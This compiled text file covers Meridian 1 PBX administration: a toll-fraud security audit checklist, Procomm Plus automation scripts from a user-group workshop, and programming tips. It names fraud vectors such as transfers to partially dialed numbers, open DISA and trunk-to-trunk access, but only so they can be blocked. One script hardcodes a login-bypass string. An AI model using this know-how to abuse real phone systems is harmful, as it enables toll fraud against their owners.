has been obtained from public Meridian Mail Administration sources on the
net..
/*
Basic Meridian 1 Security Audit
-------------------------------
"Users will go nuts calling a radio station to win a free toaster,
taking over all the trunks in your phone system."
An audit of the Meridian 1 telephone system will ensure that every possible
"system" precaution has been made to prevent fraud. The first step involves
querying data from the system in the form of printouts (or "capturing" the
data to a file in a PC). The next step is to analyze the data and confirm the
reason for each entry. Please be advised that this procedure is not designed
for all "networked" Meridian 1 systems, however, most of the items apply to
all systems. Use at your own risk.
PRINTOUTS REQUIRED FOR SECURITY AUDIT: It is suggested that you "capture" all
of the data from these printouts to separate files. This can be accomplished
with a PC and communications program. For the BARS LD90 NET printout, try
this file. (enclosed in faith10.zip barparse.zip)
------------------------------------------------------------------------------
LD22 CFN LD22 PWD LD21 CDB LD21 RDB
LD21 LTM LD23 ACD LD24 DISA LD20 SCL
LD86 ESN LD86 RLB LD86 DMI LD87 NCTL
LD87 FCAS LD87 CDP LD90 NET LD90 SUM
LD20 TNB LD22 DNB LD88 AUB
------------------------------------------------------------------------------
GATHERING DATA FROM LD81
------------------------
List (LST) the following FEAT entries to form an information base on the
telephones.
------------------------------------------------------------------------------
NCOS 00 99 CFXA UNR TLD SRE
FRE FR1 FR2 CUN CTD
------------------------------------------------------------------------------
DATA BLOCK REVIEW ITEMS
-----------------------
From the printouts, a review of the following areas must be made. Some of the
items may or may not be appropriate depending on the applications of the
telephone system.
------------------------------------------------------------------------------
CFN - Configuration Verify that History File is in use.
------------------------------------------------------------------------------
PWD - Passwords Verify that FLTH (failed login attempt threshold) is
low enough. Verify that PWD1 and PWD2 (passwords) use
both alpha and numeric characters and are eight or
more characters long. Note any LAPW's (limited access
passwords) assigned. Enable audit trails.
------------------------------------------------------------------------------
CDB - Customer Verify that CFTA (call forward to trunk access code)
Data Block is set to NO. Verify NCOS level of console. Verify
that NIT1 through NIT4 (or other night numbers) are
pointing to valid numbers. EXTT prompt should be NO
to work in conjunction with trunk route disconnect
controls (See RDB)
------------------------------------------------------------------------------
RDB - Trunk Route Verify that every route has a TARG assigned. Confirm
Data Block that FEDC and NEDC are set correctly. ETH is typical,
however for maximum security in blocking trunk to
trunk connections, set NEDC to ORG and FEDC to JNT
Confirm that ACCD's are a minimum of four digits long
(unless for paging). If ESN signaling is active on
trunk routes, verify that it needs to be. ESN
signaling, if not required, should be avoided. NOTES
ON TGAR: For demonstration purposes, this document
suggests that sets be a "TGAR 1". The only
requirement for TGAR is that it match one of the TARG
numbers assigned in the Route Data Block
------------------------------------------------------------------------------
ACD - Automatic Verify ACD queues and associated NCFW numbers.
Call Distrobution Verify all referenced extensions.
------------------------------------------------------------------------------
DISA - Direct Remove DISA if not required. If required, verify that
Inward System security codes are in use.
Access
------------------------------------------------------------------------------
ESN - Electronic AC1 is typically "9". If there is an AC2 assigned,
Switched Network verify its use. If TOD or ETOD is used - verify what
NCOS levels are changed, when they are changed and
why they are changed. Apply FLEN to your SPNs to
insure nobody is ever allowed to be transferred to a
partially dialed number, like "Transfer me to 91800"
Study EQAR (Equal Access Restriction) to insure that
users can only follow a "Carrier Access Code" with a
zero rather than a one: (1010321-1-414-555-1212 is
blocked but 1010321-0-414-555-1212 is allowed with
EQAR)
------------------------------------------------------------------------------
NCTL - Network Use LD81 FEAT PRINT to verify all NCOS being used.
Control Does NCOS 0 = FRL 0? Does NCOS X always equal FRL X
in the NCTL? Does FRL 0 have any capabilities? - It
should not be able to dial anything.
------------------------------------------------------------------------------
FCAS - Free Call Confirm the need to use FCAS
and remove it if
Screening possible. FCAS is usually a waste of system memory
and complicates the system without saving money.
------------------------------------------------------------------------------
DGT (DMI) - Digit Confirm all numbers referenced in the "insert"
Manipulation section of each DMI table.
------------------------------------------------------------------------------
RLB - BARS Route Are any RLB ENTR'S assigned FRL 0 - typically, only
List Block the RLB that handles 911 calls should have an FRL 0.
If DMI is in use, confirm all "inserted" numbers.
------------------------------------------------------------------------------
CDP - BARS Are all CDP numbers valid? Check the RLBs they point
Coordinated to and see what the DMI value is. Confirm insertions.
Dialing Plan
------------------------------------------------------------------------------
NET - ALL - BARS Add 000,001,002,003,004,005,006,007,008,009 as SPNs
Network Numbers pointing to a route list block that is set to LTER
YES. These entries block transfers to "ext. 9000" and
similar numbers. Point SPN "0" to a RLI with a high
FRL, then consider adding new SPNs of 02, 03, 04, 05,
06, 07, 08, 09 to point to a RLI with a lower FRL so
that users cannot dial "0", but can dial "0+NPA
credit card calls. Check FRL of 0, 00, 011 and
confirm that each is pointed to separate NET entry
requiring a high FRL. Remove all of shore NPAs (Like
1-809 Dominican Republic) if possible. Regulations
are almost non-existent in some of those areas and
they are hot fraud targets. Verify blocking 900 and
976 access. Also consider blocking the NXX of your
local radio station contest lines. Users will go nuts
calling a radio station to win a free toaster, taking
over all the trunks in your phone system. Restrict
the main numbers and DID range within the BARS
system. There is no need to call from an outgoing to
an incoming line at the same location.
------------------------------------------------------------------------------
TRUNKS Confirm that all trunks have TGAR assigned. Confirm
that all incoming and TIE trunks have class of
service SRE assigned. (caution on networked systems)
Confirm that all trunks have an NCOS of zero.
NOTES ON TGAR: For demonstration purposes, this
document suggests that sets be a "TGAR 1". The only
requirement for TGAR is that it match one of the TARG
numbers assigned in the Route Data Block
------------------------------------------------------------------------------
SETS-PHONES Does every phone have a TGAR of 1 assigned? (This
must be checked set by set, TN by TN). Can you change
every phone that is UNR to CTD? Review LD81 FEAT
PRINT to find out the UNR sets. CTD class of service
is explained below. Confirm that all sets are
assigned CLS CFXD? Confirm that the NCOS is
appropriate on each set. In Release 20 or above,
removing transfer feature may be appropriate. Confirm
that all sets CFW digit length is set to the system
DN length. NOTES ON TGAR: For demonstration purposes,
this document suggests that sets be a "TGAR 1". The
only requirement for TGAR is that it match one of the
TARG numbers assigned in the Route Data Block Apply
Flexible Trunk to Trunk Connections on the set, and
FTOP in the CDB if deemed appropriate. These
restrictions are done on a set by set basis and allow
or deny the ability to transfer incoming calls out of
the facility.
------------------------------------------------------------------------------
VOICE MAIL PORTS Each port should be CLS of SRE Each port should be
NCOS 0 - NCOS 0 must be known to be too low to pass
any call Each port should be TGAR 1 (all trunk routes
must be TARG 1 also) NOTES ON TGAR: For demonstration
purposes, this document suggests that sets be a
"TGAR 1". The only requirement for TGAR is that it
match one of the TARG numbers assigned in the Route
Data Block NOTE: If you are used to your Mail system
doing outcalling, you can forget about that working
after applying these restrictions.
------------------------------------------------------------------------------
CLASS OF SERVICE AND TRUNK GROUP ACCESS RESTRICTIONS:
-----------------------------------------------------
EXPLANATION OF CLASS OF SERVICE SRE:
------------------------------------
NTP DEFINITION: Allowed to receive calls from the exchange network.
Restricted from all dial access to the exchange network. Allowed to access
the exchange network through an attendant or an unrestricted telephone only.
Essentially, an SRE set can do nothing on it's own except dial internal and
TIE line extensions. If a trunk is SRE - it will work normally and allow
conference calls and transfers.
EXAMPLES OF 'SRE' IN USE:
-------------------------
Voice Mail cannot connect to an outgoing line, but can receive incoming
calls. Callers on the far end of a TIE line cannot call out through your end
(for their sake, both ends should be SRE).
EXPLANATION OF CLASS OF SERVICE CTD:
------------------------------------
If a route access code is accessed (if there was no match between the TGAR
and TARG), the caller cannot dial 1 or 0 as the leading digits. If the caller
makes a "dial 9" BARS call, the NCOS will control the call.
EXPLANATION OF TGAR AND TARG:
-----------------------------
The best restriction is to have all trunk routes TARG'd to 1 and all TNs
(including actual trunk TNs) TGAR'd to 1. This will block all access to
direct trunk route selection.
BENEFITS OF IMPLEMENTING THESE SECURITY RESTRICTIONS
----------------------------------------------------
No incoming caller will have access to an outside line unless physically
transferred or conferenced by an internal party. If voice mail ports are SRE
and NCOS 0 and have a TGAR matching the TARG - they will not be able to
transfer a call out of the system, regardless of the voice mail system's
resident restrictions assigned. No phone will be able to dial a trunk route
access code. Consider allowing telecom staff this ability for testing.
Layered security:
-----------------
If in phone programming, TGAR was overlooked on a phone, the CTD class of
service would block the user from dialing a 0 or 1 if they stumble upon a
route access code. If in programming, the CTD class of service was
overlooked, both TGAR and NCOS would maintain the restrictions. If in
programming, the NCOS is overlooked, it will defaults to zero, which is
totally restricted if NCTL and RLBs are set up correctly.
Quick Tour of a Simple Meridian 1 BARS Call
-------------------------------------------
Basic Automatic Route Selection. If you dial "9", you are accessing BARS.
"9" is the "BARS Access Code"
1. A telephone dials "9" - BARS activates.
2. The telephone calls a number - Example: 1-312-XXX-XXXX
3. The PBX hold the digits while it looks up "1-312" to figure out what
Route List to use for processing the call.
4. The Route List determines the possible trunk routes that can be used.
5. The Route List checks the facility restriction level of the telephone
and compares it to its own required facility restriction level.
6. The Route List checks to see if any special digit manipulation should
be performed.
LD90 NET
--------
The LD90 Network overlay is where area codes and exchanges are defined. If a
prefix is not entered into LD90, it cannot be dialed through BARS. Each area
code or exchange refers to a "Route List" or RLI which contains the
instructions for routing the call.
>ld 90
ESN000
REQ prt
CUST 0
FEAT net
TRAN ac1
TYPE npa
NPA 1312
NPA 1312 <-- This is the network number (prefix)
RLI 11 <-- This is the Route List that the prefix gets instruction from
DENY 976 <-- This is an exchange in NPA 312 that is blocked
SDRR DENY CODES = 1
DMI 0
ITEI NONE
REQ end
LD86 RLB (or RLI)
-----------------
The RLB is a "list" of possible trunk routes that an area code or exchange
can be dialed over. Each "ENTR" or list entry contains a trunk route. Each
entry also has a "minimum Facility Restriction Level" or "FRL" that must be
met before a phone can access that entry. In the following example, the first
entry can be accessed by phones whose NCOS equals an FRL of 3 or above. The
second entry can only be accessed by phones whose NCOS equals an FRL of 6 or
above. Along with the trunk route and the FRL, you can apply specific "digit
manipulation" with the DMI entry. The DMI entries are explained here.
>ld 86
ESN000
REQ prt
CUST 0
FEAT rlb
RLI 11
RLI 11
ENTR 0 <-- This is the list's first "Entry Number"
LTER NO
ROUT 15 <-- This is the first choice Trunk Route Number
TOD 0 ON 1 ON 2 ON 3 ON
4 ON 5 ON 6 ON 7 ON
CNV NO
EXP NO
FRL 3 <-- This is the Facility Restriction Level
DMI 10 <-- This is the Digit Manipulation Index Number
FCI 0
FSNI 0
OHQ YES
CBQ YES
ENTR 1 <-- This is the list's second "Entry Number"
LTER NO
ROUT 9 <-- This is the second choice Trunk Route Number
TOD 0 ON 1 ON 2 ON 3 ON
4 ON 5 ON 6 ON 7 ON
CNV NO
EXP YES <-- This is considered the "expensive" choice
FRL 6 <-- Note that the Facility Restriction Level is higher
DMI 0 <-- Note no digit manipulation is required for this trunk
route
FCI 0
FSNI 0
OHQ YES
CBQ YES
ISET 2
MFRL 3
REQ end
LD87 NCTL
---------
The FRL to NCOS "relationship" is built in the NCTL data block. The FRL and
the NCOS do not necessarily have the equal one another, however they usually
do. A higher FRL/NCOS has more capability than a lower FRL/NCOS. For an NCOS
number to have any capability, it must first be defined in the NCTL data
block.
>ld 87
ESN000
REQ prt
CUST 0
FEAT nctl
NRNG 0 7 <-- Range from NCOS 0 through 7 was requested
SOHQ NO
SCBQ YES
CBTL 10
---------------
NCOS 0
EQA NO
FRL 0
RWTA NO
NSC NO
OHQ NO
CBQ NO
MPRI 0
PROM 0
---------------
NCOS 1
EQA NO
FRL 1
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT I
RADT 0
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 2
EQA NO
FRL 0
RWTA NO
NSC NO
OHQ NO
CBQ NO
MPRI 0
PROM 0
---------------
NCOS 3
EQA NO
FRL 3 <-- NCOS 3 equals FRL 3.
RWTA YES
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT I
RADT 10
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 4
EQA NO
FRL 4
RWTA YES
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 10
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 5
EQA NO
FRL 5
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 10
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 6
EQA NO
FRL 6 <-- NCOS 6 equals FRL 6.
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 0
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 7
EQA NO
FRL 7
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 0
SPRI 0
MPRI 0
PROM 0
TOHQ NONE
LD86 Digit Manipulation
-----------------------
The Digit Manipulation data blocks are where special prefixes are entered
before numbers are sent out over trunks. An example of digit manipulation is
where a 1010XXX carrier access code must be inserted before a number is
processed over a trunk.
REQ prt
CUST 0
FEAT dgt
DMI 10
DMI 10 <-- This is simply the index number.
DEL 1 <-- This says "delete the first digit after "9"
CTYP NCHG
REQ prt
CUST 0
FEAT dgt
DMI 3
DMI 3
DEL 0 <-- This says "delete nothing after 9"
INST 101288 <-- This says "Insert 101288 after 9 and before the actual number
dialed"
CTYP NCHG
REQ end
Telephone
---------
This is simply a telephone's data block
DES 5135
TN 004 0 14 00
TYPE 500
CDEN 4D
CUST 0
DN 5135 MARP
CPND
NAME Typical User
XPLN 9
DISPLAY_FMT FIRST,LAST
AST NO
IAPG 0
HUNT
TGAR 1
LDN NO
NCOS 5 <-- What FRL does this equal?
SGRP 0
RNPG 0
LNRS 16
XLST
SCI 0
CLS CTD DTN FBD XFA WTA THFD FND HTD ONS
LPR XRA CWD SWD MWA LPD XHD CCSD LNA TVD
CFTD SFD C6D PDN CNID CLBD AUTU
ICDD CDMD EHTD MCTD
GPUD DPUD CFXD ARHD OVDD AGTD CLTD LDTA ASCD
MBXD CPFA CPTA DDGA NAMA
SHL ABDD CFHD
USRD BNRD OCBD
RCO 0
PLEV 02
FTR CFW 4
DATE 28 NOV 1978
LD86 ESN - the Start of BARS
----------------------------
The ESN data block is the root of BARS. Before BARS can be set up, the ESN
data block must be defined.
>ld 86
ESN000
REQ prt
CUST 0
FEAT esn
MXLC 0
MXSD 30
MXIX 0
MXDM 100
MXRL 80
MXFC 60
MXFS 0
MXSC 120
NCDP 4
AC1 9 <-- This is where "9" is defined
AC2
DLTN YES
ERWT YES
ERDT 0
TODS 0 00 00 23 59 <-- This section refers only to time of day
routing controls
RTCL DIS
NCOS 0 - 0 <-- This section refers only to time of day routing
controls
NCOS 1 - 1
NCOS 2 - 2
NCOS 3 - 3
NCOS 4 - 4
NCOS 5 - 5
NCOS 6 - 6
NCOS 7 - 7
<continued to 99...>
NCOS 99 - 99
ETOD
TGAR NO
REQ end
ISLUA 99 Session BA 20
Capturing Data From Your Meridian 1
to Various PC Software Packages
Curt Kempf City of Columbia, Missouri
Thanks for attending the workshop
I hope you find this information helpful
========================================
o ACD Daily Report
o Procomm Plus Script to
capture ACD reports to
disk. Format: MMDDYY.TXT
o TN PRT out of Host MCA card
o Procomm Script to CHG a TN
when it becomes IDLE
o Procomm Script to CHG/NEW
a list of DNs and their
NAMES (LD 95)
o Procomm Script to monitor
PBX for "DTA0021", "INI0",
"PWR01", then send an
alpha numeric page when
received.
ACD Daily Report
================
ACD 000 1999 03 29 17:00
DAILY TOTALS REPORT
REPT 1
ACD AVG CALLS AVG AVG AVG AVG DN AVG #-XFER AVG-TIME-POSN
DN AGTS ANSWD ASA DCP PCP WORK WAIT CALLS TIME IDN ACD BUSY MANNED
7380 324 54 125 388 514 127 118 69 0 28 22085 27246
------------------------------------------------------------------------------
1 324 54 125 388 514 127 118 69 0 28 22085 27246
REPT 2
ACD CALLS RECALL ANSWERED ABANDONED TOF TOF OVER INTER
DN ACCPTED TO LONGEST NO. AVG.WT TSF IN OUT FLOW FLOW
SOURCE WT. TIME BUSY
7380 366 0 476 43 88 80 0 0 8 0
------------------------------------------------------------------------------
1 366 0 476 43 88 80 0 0 8 0
REPT 4
POS CALLS AVG AVG AVG DN INC DN OUT #-XFER BUSY MANNED
ID ANSWD DCP PCP WAIT INC TIME OUT TIME IDN ACD TIME TIME
ACD DN 7380
301 81 136 115 142 3 66 12 352 0 9 20716 32208
303 57 91 261 139 4 478 15 652 0 4 20788 28702
309 49 90 2 182 0 0 1 100 0 7 4550 13466
304 87 128 127 108 1 60 12 564 0 6 22662 32088
305 39 185 108 73 0 0 2 96 0 1 11464 14302
308 0 ***** ***** ***** 15 1770 20 1464 0 0 32256 32400
306 0 ***** ***** ***** 9 2950 13 1660 0 0 32400 32400
312 11 145 2686 50 4 286 7 416 0 1 31848 32400
------------------------------------------------------------------------
8 324 125 388 127 36 93 82 88 0 28 2945 3633
Procomm Plus Script to capture ACD
reports to disk. Format: MMDDYY.TXT
====================================
; ProComm script by Chris Fourroux & Curt Kempf/City of Columbia - tested
; with ProComm Plus 32 95/NT, version 4. Script to caputure ACD reports to
; disk with the format XXXXXX.txt, where XXXXXX is month day year. Script
; waits for "ACD DN 7380" to occur, which is on every hourly report, then
; closes and appends the newest statistics to MMDDYY.TXT file.
string cmd="ncopy c:\capture\"
string szFileName = $DATE
string szDate = $DATE
integer Pos = 0
proc main
dial data "Option 61"
set capture overwrite OFF ; if capture file exists, append data to it.
capture off ; close capture file if it is open
when TARGET 0 "ACD DN 7380" call CLOSECAP
Startloop:
clear ; clear contents of screen and scroll back buffer
szFileName = $DATE
szDate = $DATE
while 1
if nullstr szFileName ; Check to see if we've reached
exitwhile ; the end of source string
endif ; and if so, exit loop.
if strfind szFileName "/" Pos ; Check for char
strdelete szFileName Pos 1 ; and delete it
else
exitwhile ; exit if no more characters
endif
endwhile
strcat szFileName ".txt"
set capture file szFileName ; Set name of capture file.
capture on ; Open up the capture file.
while strcmp $DATE szDate ; Loop while date is the same
endwhile ; or if the date changes,
capture off ; Close the capture file.
goto Startloop ; and start a new one.
endproc
proc closecap
pause 3
strcat cmd szFileName ; Append to variable "CMD"
strcat cmd " h:\uab\" ; Append network drive to "CMD"
transmit "^M***********^M" ; Put in asteriks between hourly reports
capture off ; Close capture file
pause 5
DOS cmd HIDDEN i0 ; Run "CMD" in DOS and copy file to the LAN
pause 10
taskexit i0 ; Exit DOS window
pause 10
cmd="ncopy c:\capture\" ; Reset "CMD"
capture on ; Turn Capture back on.
Endproc
Procomm Screen of dialing up the host
MCA card(direct connect 9600 baud)
=====================================
ENTER NUMBER OR H (FOR HELP): 2206
CALLING 2206
RINGING
ANSWERED
CALL CONNECTED. SESSION STARTS
logi
PASS?
TTY #02 LOGGED IN 08:59 11/4/1999
>
TN PRT out of Host MCA card
DES 2206
TN 020 0 04 31 ;note TN is TN of voice set(20 0 4 15) +(plus) 16
TYPE 2616
CDEN 8D
CUST 0
AOM 0
FDN
TGAR 1
LDN NO
NCOS 2
SGRP 0
RNPG 0
SCI 0
SSU
XLST
SCPW
CLS CTD FBD WTD LPR MTD FND HTD ADD HFD
MWD AAD IMD XHD IRD NID OLD DTA DRG1
POD DSX VMD CMSD CCSD SWD LND CNDD
CFTD SFD DDV CNID CDCA
ICDD CDMD MCTD CLBD AUTU
GPUD DPUD DNDD CFXD ARHD FITD CLTD ASCD
CPFA CPTA ABDD CFHD FICD NAID
DDGA NAMA
USRD ULAD RTDD PGND OCBD FLXD FTTU
TOV 0 MINS
DTAO MCA
PSEL DMDM
HUNT
PSDS NO
TRAN ASYN
PAR SPACE
DTR OFF
DUP FULL
HOT OFF
AUT ON
BAUD 9600
DCD ON
PRM HOST ON
VLL OFF
MOD YES
INT OFF
CLK OFF
KBD ON
RTS ON
PLEV 02
AST
IAPG 0
AACS NO
ITNA NO
DGRP
DNDR 0
KEY 00 SCR 2206 0 MARP
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
DATE 30 DEC 1997
Very rarely, I can not dial up the host MCA card. It simply won't answer, so
the following usually clears it up:
ITEM
ITEM OPE YES
DCD ON
PRM OFF
If that doesn't work, since 020 0 04 31 is "digital", it could be disabled.
LD 32 and ENLU it.
Procomm Script to CHG a TN when it becomes IDLE
===============================================
string TN ;TN
string TIPE ;TYPE, however word is reserved in ASPECT
string EYETEM ;ITEM, ditto above.
string szList ;List of items.
string szItem ;Item selected from list.
integer Event ;Dialog box event.
integer Num ;integer value
proc MAIN
set txpace 50 ;delay for keyboard
when TARGET 0 "IDLE" call CHGIT ;when receive IDLE, go change set.
;Input the TN, TYPE, and ITEM
sdlginput "LD 11, CHG when IDLE :-)" "Enter TN: " TN
if strcmp TN "" ; compare to see if NULL?
halt ;if enter is pressed, halt script.
else
endif
; Display dialog box with list of items.
; Pick if set is a 500, 2008, or 2616
szList = "2616,2008,500"
dialogbox 0 55 96 100 74 11 "LD 11, CHG when IDLE :-)"
listbox 1 5 5 90 40 szList single szItem
pushbutton 2 28 52 40 14 "&Exit" ok default
enddialog
while 1
dlgevent 0 Event ; Get the dialog event.
switch Event ; Evaluate the event.
case 0 ; No event occurred.
endcase
case 1
if strcmp szItem "2616"
tipe = "2616"
else
if strcmp szItem "2008"
tipe = "2008"
else
if strcmp szItem "500"
tipe = "500"
endif
endif
endif
endcase
default ; Exit case chosen.
exitwhile
endcase
endswitch
endwhile
dlgdestroy 0 CANCEL ; Destroy the dialog box.
sdlginput "LD 11, CHG when IDLE :-)" "ITEM: (IE: CLS HTA)" EYETEM
Transmit "LD 11^M" ;Go in to overlay 11
Waitfor "REQ"
for Num = 0 upto 100 ;Keep STAT'n til IDLE
Transmit "STAT "
Transmit TN
Transmit "^M"
pause 10 ; wait 10 seconds
endfor
endproc
PROC CHGIT
Transmit "CHG^M" ;Go change the set, then halt the script.
Waitfor "TYPE"
Transmit TIPE
pause 1 ;pause 1 second
Transmit "^M"
Waitfor "TN"
Transmit TN
Transmit "^M"
Waitfor "ECHG"
Transmit "YES^M"
Waitfor "ITEM"
Transmit EYETEM
Transmit "^M"
waitfor "ITEM"
transmit "^M"
Waitfor "REQ:"
Transmit "END^M"
halt
endproc
Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95)
===============================================================
integer flag=0 ;set flag
proc main
set txpace 100 ;delay for keyboard
when TARGET 1 "SCH2115" call LD95NEW ;wait for 'name does not exit' error
;open text file that has a list of
;DNs & NAMEs you want to change/add.
fopen 1 "C:\phone\chgnames.txt" READ
;chgnames.txt it in the format of
; 7354, Jane Doe
; 6745, John Smith
; 7645, Dan White
;script doesn't care if the NAME is NEW or CHG J
if failure
usermsg "could not open the file."
else
Transmit "LD 95^M" ;Go in to overlay 95
Waitfor "REQ"
Transmit "CHG^M"
Waitfor "TYPE"
Transmit "NAME^M"
Waitfor "CUST"
Transmit "0^M"
Waitfor "DIG"
Transmit "^M"
fseek 1 0 0
while 1
fgets 1 s0
if FEOF 1
exitwhile
endif
strtok s1 s0 "," 1
strtok s2 s0 "," 1
DelStr (&s1)
DelStr (&s2)
DelLineFeed (&s2)
;strfmt s4 "TN: %s" s1 ;uncomment these two for
;usermsg s4 ;troubleshooting the script
strlen s1 i0
if (i0 > 2)
LD95CHG ()
else
Transmit "****^M"
halt
endif
endwhile
endif
endproc
proc LD95CHG
Waitfor "DN"
Transmit s1
Transmit "^M"
pause 1
if FLAG==1
FLAG=0
Transmit "^M"
return
else
Transmit s2
Transmit "^M"
Waitfor "DISPLAY_FMT"
endif
endproc
proc LD95NEW
FLAG=1
Transmit "^M"
Transmit "**^M"
Waitfor "REQ"
Transmit "NEW^M"
Waitfor "TYPE"
Transmit "NAME^M"
Waitfor "CUST"
Transmit "0^M"
Waitfor "DIG"
Transmit "^M"
Waitfor "DN"
Transmit s1
Transmit "^M"
Waitfor "NAME"
Transmit s2
Transmit "^M"
Waitfor "DISPLAY_FMT"
Transmit "^M"
Waitfor "DN"
Transmit "^M"
Waitfor "REQ"
Transmit "CHG^M"
Waitfor "TYPE"
Transmit "NAME^M"
Waitfor "CUST"
Transmit "0^M"
Waitfor "DIG"
endproc
proc DelStr
param string szStr
integer Pos
while 1
if StrFind szStr "`"" Pos
StrDelete szStr Pos 1
else
exitwhile
endif
endwhile
endproc
PROC DelLineFeed
param string szStr
integer Pos
strlen szStr Pos
if (Pos > 2)
StrDelete szStr (Pos-1) 1
endif
endproc
You could very easily modify this script to say, change an ASCII list of TNs
/TYPEs to TGAR 1, and have it executed at 2:00 a.m. The s0 and s1 variables
would change from DN & NAME, to TN & TYPE, and add Waituntil "2:00:00" "7/16
/99" to kick it off at 2:00 a.m.
Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send
an alph numeric page when received.
=======================================================================
proc Main
#DEFINE pagernum "235.5334" ;Enter your pager number here.
string szName="OPT61.cap" ;Name of text file to capture to.
string passw
when TARGET 1 "DTA021" call DTA021 ;what do you want to 'wait for' ?
when TARGET 2 "INI0" call INI0
when TARGET 3 "PWR01" call PWR0
set capture file szName
capture on
set txpace 150 ;delay for keyboard
HANGUP
Dial DATA "MCA"
transmit "^M"
waitfor "HELP):"
transmit "2206^M"
waitfor "SESSION STARTS"
while $CARRIER
transmit "****"
pause 1
transmit "LOGI^M"
waitfor "PASS?"
sdlginput "Security" "Password: (all caps!)" passw MASKED
if stricmp passw "sss" ;to bypass logging in.
transmit "*"
call loggedin
endif
transmit passw
transmit "^M"
pause 2
endwhile
set txpace 1
endproc
proc DTA021
pageA() ;dial paging provider
TRANSMIT "Digital Trunk Diagnostic. Frame alignment persisted for
3 seconds^M" ;send specific x11 error to pager
pageB() ;end connection to provider
mcacard() ;connect back to Option 61
endproc
proc INI0
pageA()
TRANSMIT "An initialization has taken place.^M"
pageB()
mcacard()
endproc
proc PWR0
pageA()
TRANSMIT "Power failure from power and system monitor.^M"
pageB()
mcacard()
endproc
proc mcacard
HANGUP
PAUSE 2
Dial DATA "MCA" ;Connect up to option 61 through MCA card.
while $DIALING
endwhile
transmit "^M"
pause 1
transmit "^M"
waitfor "HELP):"
transmit "2206^M"
waitfor "SESSION STARTS"
pause 1
when RESUME
call loggedin
loggedin()
endproc
proc loggedin
while $CARRIER ;wait for errors to occur. Continue to do your MACs etc..
endwhile
endproc
proc pageA
when SUSPEND
set port dropdtr on
pause 1
hangup ;hangup Option 61 connection
pause 2
hangup ;release mca card from COM port
set port dropdtr off
pause 1
Dial DATA "TriStar" ;Dial your paging provider
while $DIALING
endwhile
TRANSMIT "^M" ;TAPI protocol, M puts in manual mode.
WAITFOR "ID="
TRANSMIT "M^M"
WAITFOR "Enter pager"
TRANSMIT pagernum
TRANSMIT "^M"
WAITFOR "Enter alpha"
endproc
proc pageB
TRANSMIT "^M"
WAITFOR "More Pag"
TRANSMIT "^M"
pause 2
endproc
Little Known Meridian 1 Features And Programming Tricks
=======================================================
HELP and Error Lookup
HELP - Type " ? " at many prompts
LOOKUP - At " > " sign, type
ERR AUD028 to find out what AUD028 indicates.
At any other prompt, type " ! ", then you will receive " > "
symbol for getting ERR lookup.
Find Sets with a Certain Feature
================================
LD81
REQ LST
FEAT CFXA
FEAT UNR
Lists all sets that have the "Call Forward External Allow"
feature, then lists all UNR sets.
Inventory and Identification Commands
=====================================
LD32
IDU l s c u (or) IDC l s c
LD22
CINV (and) ISSP
LD30
UNTT l s c u
Speed Call Stuff
================
Create many Speed Call lists at once. LD18 REQ: NEW 100 - Creates 100 lists.
When memory is plentiful, make Speed Call list number the same as the persons
DN. Need to increase MSCL in LD17 Find a "Controller" in LD81 by: REQ:LST,
FEAT:SCC, then the Speed List Number
Allow Restricted Sets to Dial Certain Long Distance Numbers.
============================================================
Add the numbers to a System Speed Call List. Assign an NCOS to the "List"
that replaces the users NCOS during the call. Alternate: Add the suffix of
the telephone number to an ARRN list in the prefixes RLI. This will point
only that number to a new RLI with a lower (or higher if you choose) FRL.
Look up ARRN in LD86
PBX Clock Fast or Slow?
=======================
LD2
SDTA X Y -- x y
X = 0 for "subtract time each day" -or- 1 for "add time each day"
Y = 0-60 seconds to be added or subtracted each day.
Daylight Savings Question?
TDST Look this one up in LD2 before changing
Phantom DNs, TNs, and "MARP to Voice Mail" TNs
==============================================
Phantom TN with FTR DCFW ACD Queues with NCFW but no Agents 2616 Sets with
AOMs (AOMs can be in "software", but do not need to be "installed" on the
set). This is an excellent "MARP TN" for DNs that need to HUNT/FDN to Voice
Mail
Digit Display on Trunk Routes and ACD Queues
============================================
Find Trunk Route Access Codes - name in LD95 like any other DN ACD Numbers -
name in LD95 like any other DN IDC Numbers - name in LD95 at DCNO prompt.
Limited Access Passwords
========================
Print PWD in LD22 before starting
LD17
LAPW 01
PW01 12345
OVLA 10 11 20
Identify Trunks, Routes and TTY Ports with "DES" Entry
======================================================
LD17 ADAN
DES can be 1-16 characters
LD16 RDB
DES can be 1-16 characters
LD14 TRK
DES can be 1-16 characters
TKID - enter telephone number
Free Up or Block DN Range
=========================
Change your SPRE Code to 4 digits LD15 - SPRE XXXX Assign all current feature
codes as Flexible Feature Codes To hide DNs from appearing in LUDN printouts,
enter DN prefix ranges as an FFC for "Ring Again Activate"
Save "Call Forward" Status upon Reload/Sysload
==============================================
LD17
CFWS YES
Call Waiting "Buzz" on Digital Sets is Not Long Enough
======================================================
Turn on Flexible Incoming Tones Allowed
LD15
OPT SBA DBA
LD 11
CLS FITA
"DSP" Display Key Applications
==============================
Youre on the phone, another call comes in...Press DSP, then ringing line to
see whos calling. Press DSP, then Speed Call, then entry number to view
entries. Rls23 Update - automatic Display CLS TDD
NHC - No Hold Conference
========================
With NHC, other party is not placed on hold while adding conferees. You can
also disconnect conferee called with NHC
LD11
KEY X NHC
Rls23 Update - Conf. Display/Disconnect
LD11
CLS CDCA
Call Forward Indication on 2500 Sets
====================================
Add Call Forward Reminder Tone. Special dial tone is heard only when call
forwarded.
LD15
OPT CFRA
Override Call Forwarded Phone
=============================
Add Flexible Feature Code for "CFHO". Dial CFHO code, then dial extension.
LD57
CODE CFHO
On sets needing ability to perform override
CLS CFHA
Call Forward ONLY Internal Calls - Let Externals Ring
=====================================================
Great when you need to prioritize external callers.
LD11
